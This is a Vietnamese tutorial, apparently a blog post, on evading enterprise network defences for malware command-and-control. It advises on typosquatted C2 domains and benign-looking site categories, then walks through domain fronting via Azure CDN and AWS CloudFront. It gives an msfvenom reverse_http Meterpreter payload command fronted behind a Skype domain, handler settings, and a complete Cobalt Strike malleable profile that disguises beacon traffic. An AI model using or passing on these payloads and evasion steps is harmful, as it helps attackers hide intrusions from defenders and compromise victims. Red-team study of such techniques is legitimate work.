+3

Bypassing Network Filters

Network Filters

Khi một malware được cài đặt vào máy của nạn nhân, nó sẽ cố gắng kết nối tới C2 thông qua các giao thức mạng được thiết lập từ trước. Tuy nhiên trong mạng doanh nghiệp, chúng ta sẽ bắt gặp nhiều giải pháp bảo mật khác nhau như Web Proxy, IDS, Deep Packet Inspection và buộc phải vượt qua chúng.

Mô hình như sau :

Ở đây ta thấy, nếu chúng ta cài đặt thành công Malware vào máy nạn nhân (ví dụ: Phishing), kết nối đi từ máy nạn nhân tới C2 sẽ gặp nhiều thách thức khác nhau từ các giải pháp bảo mật.

Vì mô hình này tốn kém và phức tạp, nên trong một số tổ chức nó được đơn giản hóa bằng cách kết hợp đa chức năng trên cùng một thiết bị. Ví dụ một máy chủ proxy có thể không chỉ đóng vai trò như một proxy mà kiêm nhiệm cả chức năng IDS,SSL và Domain filtering.

1. DNS Filters

Khi tiến hành tạo một domain cho C2, thông thường chúng ta đăng ký một domain hoàn toàn mới để nằm ngoài blacklist của Firewall ở các cuộc tấn công trước đó (nếu có). Điều này có thể gây bất lợi do "độ uy tín" của những domain này tương đối thấp, thời gian đăng ký sử dụng ngắn , lưu lượng truy cập lại ít. Do đó chúng ta nên đăng ký domain từ trước, đồng thời tạo lưu lượng truy cập ổn định trước khi mang domain ra sử dụng.

Ngoài ra website phải được "núp bóng" dưới danh nghĩa các trang web vô hại. Thay vì gán các category thú vị như "phishing" ,"virus", "webmail" thì ta có thể gán các category liên quan tới ẩm thực ,du lịch hay nghệ thuật .

(Điều này phải làm ngay sau khi tạo một website để được phân loại vào danh mục vô hại)

Tuy nhiên trong trường hợp domain của chúng ta bị liệt vào danh sách "độc hại" chúng ta cũng có thể yêu cầu đánh lại category tại https://domain.opendns.com/

Ngoài ra, chúng ta nên thực hiện các bước để làm tên miền có thêm tính hợp pháp. Ví dụ một tên miền bao gồm văn bản hợp pháp sẽ tốt hơn một domain bao gồm nhiều ký tự lằng nhằng, ngẫu nhiên, bao gồm cả chữ cả số . Một kỹ thuật được sử dụng phổ biến của các Hacker là sử dụng domain "sai chính tả". Ví dụ mục tiêu sử dụng domain example.com thì chúng ta có thể sử dụng exampl1e.com hoặc examplle.com , Examlpe.com

Chúng ta nên kiểm tra kỹ C2 Domain có nằm trong danh sách độc hại không thông qua một số trang như Virustotal hay IPVoid trước khi thực hiện redteam.

Cuối cùng thì Subdomain Takeover vẫn là xịn xò nhất

2. Full Packet Capture Devices

wireshark-1.png

Một số doanh nghiệp yêu cầu độ bảo mật cao, đồng thời có nhiều Blue Team kinh nghiệm có thể sử dụng Wireshark để chặn bắt gói tin của Malware, từ đó phát hiện ra lưu lượng mạng độc hại. Với cách này chúng ta không có kỹ thuật "bypass" nào có thể được sử dụng. Chỉ cố gắng hạn chế tối đa lưu lượng bất thường bằng cách thử nghiệm nhiều lần trên máy local trước khi tham gia chiến dịch. Ví dụ công ty đặt tại Viêt Nam nhưng Malware lại trỏ lưu lượng về C2 ở ...Châu Phi. Đó là điều cần phải khắc phục !!!

3. Domain Fronting

Domain Fronting có thể là giải pháp hiệu quả nhất để Bypass Network Filters. Theo đó chúng ta sẽ "trộn" lưu lượng C2 của mình thông qua một CDN hợp pháp

3.1. Domain Fronting with Azure CDN

1_6Y7M_IdvS8Knudccze4XDw.png

Ở phần này, chúng ta sẽ cùng đi qua cách cấu hình Domain Fronting với Microsoft Azure.

Nguyên liệu

 • Một Domain (babyshophorse.tk)
 • Tài khoản Microsoft Azure
 • Một Server đóng vai trò C&C

Bước 1. Đăng nhập tài khoản Azure, tạo CDN

YAEScreenshot_1.png

Bước 2. Cài đặt các thông số cần thiết

Trong đó giá trị tier buộc phải đặt là Standard Verizon

yAYScreenshot_3.png

Bước 3. Tạo thành công

3S4Screenshot_4.png

WdrScreenshot_5.png

Tiếp tới cấu hình Router như sau

LWyScreenshot_6.png

Việc Disable Cache là bắt buộc, Cache sẽ làm lỗi kết nối C2 của chúng ta

ZxaScreenshot_7.png

Bước 4: Tìm một lớp "áo" bọc bên ngoài.

Vì chúng ta thiết lập một endpoint CDN Azure. Nên domain cần tìm cũng phải được lưu trữ trên Azure. Cụ thể chúng ta cần một domain *.azureedge.net .

Sử dụng FindFrontableDomains để làm điều này

git clone https://github.com/rvrsh3ll/FindFrontableDomains.git
sudo ./setup.sh
python3 FindFrontableDomains.py --domain skype.com -threads 20

Tập trung tìm kiếm các domain liên quan tới Microsoft cho thấy hiệu quả cao hơn

HmQScreenshot_1.png

Ở đây ta có thể dùng các domain hiển thị bên trên làm lớp "áo" bên ngoài

Bước 5. Dùng "áo" (sdk.cdn.skype.com) bọc bên ngoài

N7kScreenshot_2.png

Kiểm tra kết nối với Wireshark. Ta nhận thấy ban đầu connect được thực hiện tới sdk.cdn.skype.com sau đó được chuyển hướng tới máy chủ C2 của chúng ta

t6cScreenshot_3.png

Vì nhiều tổ chức thường sử dụng Skype cho các cuộc họp, lưu lượng truy cập kiểu này sẽ không nổi bật và hoàn toàn hợp pháp. Nó sẽ bypass tất cả mọi thứ (Domain, DNS, Proxy) trong một lần

Hacker Mode

Tạo payload Msfvenom trên C&C

msfvenom -p windows/x64/meterpreter/reverse_http lhost=sdk.cdn.skype.com lport=80 HttpHostHeader=azure-f6f3bhaucthwa9hq.z01.azurefd.net -f exe > http-df.exe

Lắng nghe với multi/handler

set LHOST sdk.cdn.skype.com
set OverrideLHOST sdk.cdn.skype.com
set OverrideRequestHost true
set HttpHostHeader azure-f6f3bhaucthwa9hq.z01.azurefd.net
run -j

3.2. Domain Fronting with AWS CloudFront

df_http_noproxy2.png

Ưu điểm

 • Tích hợp lưu lượng C2 vào CDN
 • CloudFront ít khi bị chặn, vì nếu chặn sẽ ảnh hưởng tới các dịch vụ khác của công ty
 • IP Source bị ẩn đi, nên không cần thay thế thường xuyên (Do bị block)
 • Lưu lượng được mã hóa với HTTPS
 • Tên miền uy tín

M5nScreenshot_3.png

Thiết lập

 1. Setup a Cobalt Strike (CS) server
 2. Register a domain and point it your CS server
 3. Generate an HTTPS cert for your domain
 4. Create a CloudFront distribution to point to your domain
 5. Generate a CS profile that utilizes your HTTPS cert and the CloudFront distribution
 6. Generate a CS payload to test the setup

Cài đặt

Đăng ký domain http://576747640bbc9e8922cb0c45c7357ccee4ccd36a.tk

(Subdomain kubi.576747640bbc9e8922cb0c45c7357ccee4ccd36a.tk)

micScreenshot_3.png

Sau đó tiến hành trỏ về server

pA7Screenshot_1.png

Tạo SSL với Let's Encrypt

sudo apt-get install -y git lsof
sudo apt install certbot python3-certbot-apache;
cd && wget https://raw.githubusercontent.com/killswitch-GUI/CobaltStrike-ToolKit/master/HTTPsC2DoneRight.sh 
&& chmod +x HTTPsC2DoneRight.sh && ./HTTPsC2DoneRight.sh

Lưu ý: Phải cài đặt certbort trước, nếu không tool sẽ không chạy

ds0Screenshot_4.png

 • DNS : Domain của bạn

 • Common password : Mật khẩu profile (trường hợp này đặt là nopassword)

 • CobaltStrike : Vị trí CS trên server

Sau khi cài đặt hoàn thành , ta có 2 nội dung file sau trong CobaltStrike Forder

ecyScreenshot_5.png

Quan tâm 4 dòng cuối file amazon.profile (4 dòng cuối này sẽ được dùng ở phía dưới)

Screenshot_6.png

Đưa traffic qua CloudFront

Truy cập https://console.aws.amazon.com/cloudfront/home

Create Distribution

Screenshot_7.png

Screenshot_8.png

Screenshot_9.png

Quá trình khởi tạo thành công, CloudFront sẽ cấp cho chúng ta một Domain mới (@cloudfront.net)

Screenshot_10.png

Tạo profile C&C mới sử dụng Malleable-C2-Randomizer


git clone https://github.com/bluscreenofjeff/Malleable-C2-Randomizer && cd Malleable-C2-Randomizer 
python malleable-c2-randomizer.py -profile Sample\ Templates/Pandora.profile -notest
cp /root/Malleable-C2-Randomizer/pandora__W0l1reuH.profile /home/hoamsfconsole/cobaltstrike4.4/httpsProfile

Sau khii tạo thành công, chúng ta tiến hành sửa chữa như sau

 • Add https-cert (4 dòng ở phía trên)
https-certificate {
set keystore "kubi.576747640bbc9e8922cb0c45c7357ccee4ccd36a.tk.store";
set password "nopassword";
}
 • Add time số post-ex
post-ex {    
    set spawnto_x86 "%windir%\\syswow64\\mstsc.exe";
    set spawnto_x64 "%windir%\\sysnative\\mstsc.exe";
}
 • Thay đổi giá trị "Host" sang CloudFront domain
    header "Host" "d2hc65zh7vhy7u.cloudfront.net";

Hoàn tất quá trình, ta sẽ có một profile như sau :

set sleeptime "030";
set jitter  "0";
set maxdns  "244";
set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)";


http-get {

  set uri "/access/";

  client {

    header "Accept" "*/*";
    header "GetContentFeatures.DLNA.ORG" "1";
    header "Host" "d2hc65zh7vhy7u.cloudfront.net";
    header "Cookie" " __utma=204159236.1625460612.9748758395.2605486039.4133151740.2;";

    parameter "version" "4";
    parameter "lid" "0329816287";

    metadata {
      netbios;
      parameter "token";
    }
  }

  server {

    header "Server" "Apache";
    header "Cache-Control" "no-cache, no-store, must-revalidate, max-age=-1";
    header "Pragma" "no-cache, no-store";
    #header "Expires" "-1";
    header "Connection" "close";
    header "Content-Type" "audio/mp4";

    output {

      # mp4 header
      # 0000000: 0000 001c 6674 7970 6d70 3432 0000 0001 ....ftypmp42....
      # 0000010: 4d34 5620 6d70 3432 6973 6f6d 0001 6fd9 M4V mp42isom..o.

      prepend "\x6d\x6f\x6f\x76\x00\x00\x00\x6c\x6d\x76\x68\x64";
      prepend "\x4d\x34\x56\x20\x6d\x70\x34\x32\x69\x73\x6f\x6d\x00\x01\x6f\xd9";
      prepend "\x00\x00\x00\x1c\x66\x74\x79\x70\x6d\x70\x34\x32\x00\x00\x00\x01";

      print;
    }
  }
}

http-post {
  
  set uri "/radio/xmlrpc/v35";

  client {

    header "Accept" "*/*";
    header "Content-Type" "text/xml";
    header "X-Requested-With" "XMLHttpRequest";
    header "Host" "d2hc65zh7vhy7u.cloudfront.net";

    id {
      parameter "rid";
    }

    parameter "lid" "3962082724";
    parameter "method" "getSearchRecommendations";

    output {
      base64;
      print;
    }
  }

  server {

    header "Content-Type" "text/xml";
    header "Cache-Control" "no-cache, no-store, no-transform, must-revalidate, max-age=0";
    header "Expires" "-1";
    header "Vary" "Accept-Encoding";
    header "Content-Encoding" "gzip";

    output {
      print;
    }
  }
}

https-certificate {
set keystore "kubi.576747640bbc9e8922cb0c45c7357ccee4ccd36a.tk.store";
set password "nopassword";
}

post-ex {    
    set spawnto_x86 "%windir%\\syswow64\\mstsc.exe";
    set spawnto_x64 "%windir%\\sysnative\\mstsc.exe";
}

4 Thực thi

./teamserver IP [password] pandora__W0l1reuH.profile 


All Rights Reserved

Viblo
Let's register a Viblo Account to get more interesting posts.